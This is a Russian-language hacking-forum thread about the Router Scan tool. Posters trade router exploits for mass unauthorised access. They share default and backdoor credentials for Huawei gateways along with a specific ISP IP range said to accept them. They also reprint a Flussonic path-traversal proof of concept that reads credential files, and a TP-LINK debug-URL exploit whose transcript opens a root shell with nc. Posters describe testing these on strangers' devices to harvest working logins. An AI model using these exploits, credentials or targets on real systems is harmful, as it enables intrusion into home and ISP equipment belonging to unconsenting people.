прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    567
    Likes Received:
    735
    Reputations:
    2
    опять форум в дауне :) кстати госопда гуру, ни у кого случайно не завалялся эксплойтик по обходу аутентификации для хом гатевей? есть только отдельными скриптами. а напрямую запросами из браузера не нашел.
     
  2. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,672
    Likes Received:
    5,797
    Reputations:
    51
    Я об ней не знать, так бы помог.
    Ну эта тема не весь форум, согласен с binarymaster лучше, но пока он отсутствует мы копим уязвимости для RS, ничего более не остается , так что не грусти.
    Felis-Sapiens тоже гуру, может и немного в разных направлениях, но все равно.
    RS - все сильнее.
     
    sha9, VladimirV and CRACK211 like this.
  3. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,046
    Likes Received:
    1,127
    Reputations:
    11
    Вопрос к гуру) есть ли надежда на то что вы выпустите lite версию программы? Для запуска в дальнейшем на андроид устройствах через эмулятор) lite версия с миним функций для уменьшения нагрузки на процессор и память) но с тем же количеством эксклоитов)
     
    VladimirV likes this.
  4. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,167
    Likes Received:
    617
    Reputations:
    690
    Читал в этой ветке ссылку где ip всех стран можно спарсить по прову, не могу найти, скиньте кому не влом)
    P.S и еще поделитесь норм словариком именно под RS) мона и в ПМ)
     
    _________________________
  5. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,046
    Likes Received:
    1,127
    Reputations:
    11
    https://forum.antichat.ru/threads/427913/
     
    sha9 and shell_c0de like this.
  6. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    Скажем дружно на*** нужно. Через кривой эмулятор, с неудобным упарвлением, без нормального лекарства это не вариант. Нужно пилить нативное приложение под ведро. На мобильных устройствах есть свои плюсы, минусы и особенности работы такого софта. Навскидку:
    1) Обычно сканируется локальная сеть - есть проблема с регулярной переделкой списка ip для сканирования
    2) Интернет на мобильном устройстве - это не витая пара, а слабый и нестабильный вайфай, что тоже нужно учесть.
     
    sha9 and binarymaster like this.
  7. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,046
    Likes Received:
    1,127
    Reputations:
    11
    У каждого свои нужды) и через wifi все нормально работает, если без фанатизма ) и таскать ноутбук не всегда удобно. А телефон с планшетом всегда под рукой и просканировать небольшой диапазон всегда можно) очень удобно, пускай не 1000ми гудов в день. Но несколько десятков гудов в день насканить можно)
     
  8. Nem0

    Nem0 New Member

    Joined:
    28 Nov 2015
    Messages:
    30
    Likes Received:
    4
    Reputations:
    0
    У меня на ура эти Thomson/Technicolor отдавали настройки в большинстве случаев там такая комбинация<empty>:admin насканировал в свое время дофига таких
     
    sha9 likes this.
  9. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    567
    Likes Received:
    735
    Reputations:
    2
    что значит не грусти? без вас скучно :) я согласен, что РС сильнее. и это радует. и внушает некоторое удовлетворение маленькой причастности к такому знаменательному труду. глядишь - наш великий О'SENSEI - binarymaster свою лабораторию пентеста организует. и нас как тестеров не забудет :) :) :)
    кстати - спасибо Triton_Mgn. я ничуть не сомневался в вас :) я давно уже знаю, что с вами смело можно идти в разведку (без иронии) :)
    теперь серьезно и по теме. HuaweiHomeGateway особенно много встречается на порту 7547. недавно наткнулся. провы порты прячут :) раньше по этой сетке ходил но на стандартных портах. думал, что в удаленке нет роутеров. а тут вдруг попробовал нестандартные порты и нашел неимоверное количество этих хомов. но эксплойты в основном через метасплойт. интересно было бы найти что-то ближе к роутерскану. может кто встречал и поделится во имя общего блага ?
     
    Payer and Triton_Mgn like this.
  10. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    567
    Likes Received:
    735
    Reputations:
    2
    кстати, порадовала еще одна фишка - экспериментировал с роутерсканом и увидел одну приятную мелочь (я во всяком случае об этом не знал). уменьшил количество потоков до 50 ( обычно уменьшал всегда до 130) и количество найденных роутеров увеличилось по одному и тому же провайдеру
     
    TOX1C, CRACK211, Upsurt and 2 others like this.
  11. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    567
    Likes Received:
    735
    Reputations:
    2
    на счет Felis-Sapiens даже вопросов быть не может.гуру с большой буквы. но тоже без binarymaster редко ветку посещает :-( .
    ну да ладно. копим - так копим :)
    как-то тут поднимался вопрос по поводу Flussonic. вот нарыл эксплойты, правда пока не разобрался с ними до конца. не знаю, можно ли его будет прикрутить к роутерскану. вроде по http работают.буду пробовать. эти соники частенько попадаются при сканировании РСк. жалко их оставлять без внимания :)
    Document Title:
    ============
    Flussonic Media Server Multiple Vulnerabilities

    Release Date:
    ===========
    June 29, 2014

    Product & Service Introduction:
    ========================
    Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5).

    Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network.

    Abstract Advisory Information:
    =======================
    BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3

    Vulnerability Disclosure Timeline:
    =========================
    June 26, 2014 : Contact with Vendor
    June 26, 2014 : Vendor Response
    June 26, 2014 : Version 4.3.4 Deployed
    June 29, 2014 : Public Disclosure

    Discovery Status:
    =============
    Published

    Affected Product(s):
    ===============
    Erlyvideo, LLC
    Product: Flussonic Media Server 4.1.25 - 4.3.3

    Exploitation Technique:
    ==================
    AFR: Remote, Unauthenticated
    ADL: Remote, Authenticated

    Severity Level:
    ===========
    High

    Technical Details & Description:
    ========================
    1. Arbitrary File Read (Unauthenticated)
    It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.

    2. Arbitrary Directory Listing (Authenticated)
    It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.


    Proof of Concept (PoC):
    ==================
    Proof of Concept AFR Request & Response:

    GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
    Host: 6.6.6.100:8080
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

    HTTP/1.1 200 OK
    Connection: keep-alive
    Server: Cowboy
    Date: Thu, 26 Jun 2014 09:50:57 GMT
    Content-Length: 191
    Content-Type: text/plain
    Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
    Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687

    # Default ports Flussonic M1 Media server listens on
    http 80;
    http 8080;
    rtmp 1935;
    rtsp 554;
    pulsedb /var/run/flussonic;
    edit_auth flussonic letmein!;

    live mylive;

    file vod {
    path priv;
    }

    2. Proof of Concept ADR Request & Response:

    GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
    Host: 6.6.6.100:8080
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
    Connection: keep-alive

    HTTP/1.1 200 OK
    Connection: keep-alive
    Server: Cowboy
    Date: Thu, 26 Jun 2014 11:04:12 GMT
    Content-Length: 7555
    X-Route-Time: 28
    X-Run-Time: 8090
    Content-Type: application/json

    {“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
    ………
    {“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}



    Security Risk:
    ==========
    The risk of the vulnerabilities above estimated as high and medium.

    Credits & Authors:
    ==============
    Bilgi Güvenliði Akademisi
    Тип воздействия:
    Раскрытие важных данных
    Раскрытие системных данных
     
    #2151 sha9, 27 Apr 2016
    Last edited: 27 Apr 2016
    CRACK211 and Payer like this.
  12. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    567
    Likes Received:
    735
    Reputations:
    2
    в догон. :) проводил тут на днях проверку провайдеров. пришел к выводу - если найдем способ подобраться к HuaweiHomeGateway работающих на 7547 порту - результаты сканирования увеличатся в разы. ряд провайдеров целые ветки прячут на этом порту. видимо энтузиасты RS достали до печенок :)
     
  13. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    567
    Likes Received:
    735
    Reputations:
    2
    экспериментировал сегодня с HuaweiHomeGateway и роутерсканом. выяснил одну маленькую вещь - пассы провайдер на все гетвэи ставит дефолтные - root:admin. при скане роутерскан их не определяет. в браузере пасс принимается, но страницу настроек не выдает во внешнюю сеть. как-то так получается. потому роутерскан и не выдает гуды по ним. будем копать дальше :)
     
    CRACK211 and Triton_Mgn like this.
  14. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,672
    Likes Received:
    5,797
    Reputations:
    51
    Копайте мистер копайте,
    RS не всевидящий же , тоже было замечено почему спарсенная пара логин пароль не выдает внутренности,
     
    sha9 likes this.
  15. freee

    freee Active Member

    Joined:
    8 Aug 2015
    Messages:
    212
    Likes Received:
    227
    Reputations:
    4
    В своей сети попадаются такие, на сайте оператора нет прошивок к ним, методом отсеивания выбрал 4 модели с сайта производителя. благо их там не много, в прошивках одинаковые shadow , расшифровка дала лог\пас root:root , значит у вашего провайдера своя прошивка или он сам меняет пас.
    Можете поделиться ip диапазоном с HuaweiHomeGateway, хочется в прошивке покапать.
    И еще 7547 порт это CWMP говорит wiki, как с ним общаться кто знает?
    Также попадаются Netgear EVG1500 CPE (Есть ли у кого прошивка?) и SERCOMM CPE - что за зверь?
     
    CRACK211 and sha9 like this.
  16. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    567
    Likes Received:
    735
    Reputations:
    2
    привет triton :) вот нарыл интересный эксплойтик на туполинки
    http://IP/userRpmNatDebugRpm26525557/start_art.html
    пример как тут
    root@secu:~# ls -l /srv/tftp/nart.out
    -rw-r--r-- 1 root root 871604 Mar 11 18:23 /srv/tftp/nart.out
    root@secu:~# nc 192.168.0.1 2222
    (UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
    root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html
    Connecting to 192.168.0.1:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/html]
    Saving to: "start_art.html"

    [ <=> ] 426 --.-K/s in 0s

    2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

    root@secu:~# nc 192.168.0.1 2222
    ps
    PID Uid VmSize Stat Command
    1 root 404 S init
    2 root SW< [kthreadd]
    3 root SW< [ksoftirqd/0]
    4 root SW< [events/0]
    5 root SW< [khelper]
    6 root SW< [async/mgr]
    7 root SW< [kblockd/0]
    8 root SW [pdflush]
    9 root SW [pdflush]
    10 root SW< [kswapd0]
    17 root SW< [mtdblockd]
    18 root SW< [unlzma/0]
    71 root 2768 S /usr/bin/httpd
    76 root 380 S /sbin/getty ttyS0 115200
    78 root 208 S ipcserver
    82 root 2768 S /usr/bin/httpd
    83 root 2768 S /usr/bin/httpd
    86 root 732 S ushare -d -x -f /tmp/ushare.conf
    92 root 348 S syslogd -C -l 7
    96 root 292 S klogd
    101 root SW< [napt_ct_scan]
    246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
    247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
    251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
    286 root 2768 S /usr/bin/httpd
    299 root 2768 S /usr/bin/httpd
    300 root 2768 S /usr/bin/httpd
    305 root 2768 S /usr/bin/httpd
    307 root 2768 S /usr/bin/httpd
    309 root 2768 S /usr/bin/httpd
    310 root 2768 S /usr/bin/httpd
    389 root 2768 S /usr/bin/httpd

    подключается по арт и кажется можно выдрать настройки. еще не пробовал. пробовал только подключаться. написано было что работает с туполинками TL-WDR4300; TL-WR743ND (v1.2 v2.0)
    но я тестил и на TP-LINK TL-WR843ND; TP-LINK TL-WR940N которые роутерскан не спарсил в гуды. подключение пошло. значит можно играть дальше :) может к возвращению наших гуру binarymaster и Felis-Sapiens что нибудь стоящее для модернизации роутерскана и соберем :)


     
    CRACK211 likes this.
  17. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    567
    Likes Received:
    735
    Reputations:
    2
    ну например этот
    178.168.78.1-178.168.79.254
    на 7547 порту их валом. как я и говорил - провайдер на все хювеи ставит пароль root:admin. но вот как до прошивки добраться - пока не знаю :)

    по поводу SWMP нашел одну интересную статейку. по крайней мере стало понятно почему не дает настройки. http://byfly.ws/instrukcii/4923-otklyuchaem-cwmp-kontrol-nad-modemami-promsvyaz-zte.html
     
    #2157 sha9, 28 Apr 2016
    Last edited: 28 Apr 2016
    CRACK211 likes this.
  18. Ossen

    Ossen Active Member

    Joined:
    4 Jun 2015
    Messages:
    229
    Likes Received:
    155
    Reputations:
    0
    Побробуйте такую комбинацию telecomadmin:NWTF5x%RaK8mVbD
     
    sha9 likes this.
  19. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    567
    Likes Received:
    735
    Reputations:
    2
    на Huawei HG8245C и HuaweiHomeGateway не подошли.
     
    Triton_Mgn likes this.
  20. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    567
    Likes Received:
    735
    Reputations:
    2
    backdoor в некоторых моделях Huawei HG8245
    менедж аккаунт

    admin:*6P0N4dm1nP4SS*

    а также по умолчанию

    root:admin

    подробности тут
    The Huawei HG8245 ONT, firmware version V1R006C00S100 which provides cellular services, contains 3 severe vulnerabilities: two administrator accounts enabled by default and a public administration interface exposed to the Internet.
    The backdoor is a web management account enabled by default and the password cannot be changed. In this version the default administrator password is:
    admin:*6P0N4dm1nP4SS*
    Another administrator user exists by default for the telnet service:
    root:admin

    ссылка http://websec.ca/advisories/view/Huawei-web-backdoor-and-remote-access
    это конечно старенькая дырочка, но может кому-то пригодится. не все же тут хакеры со стажем :cool: есть и начинающие хац... пардон - пентестеры :);)
    и кстати из проверенных мной вчера 32 Huawei HG8245С и Huawei HG8245H, 27 отдали настройки по рут-админ. только роутерскан их не спарсил видимо из-за того, что страница настроек грузится очень долго. и пока дойдет дело до этой пары роутер в локе
     
    #2160 sha9, 29 Apr 2016
    Last edited: 29 Apr 2016
    Ossen and Payer like this.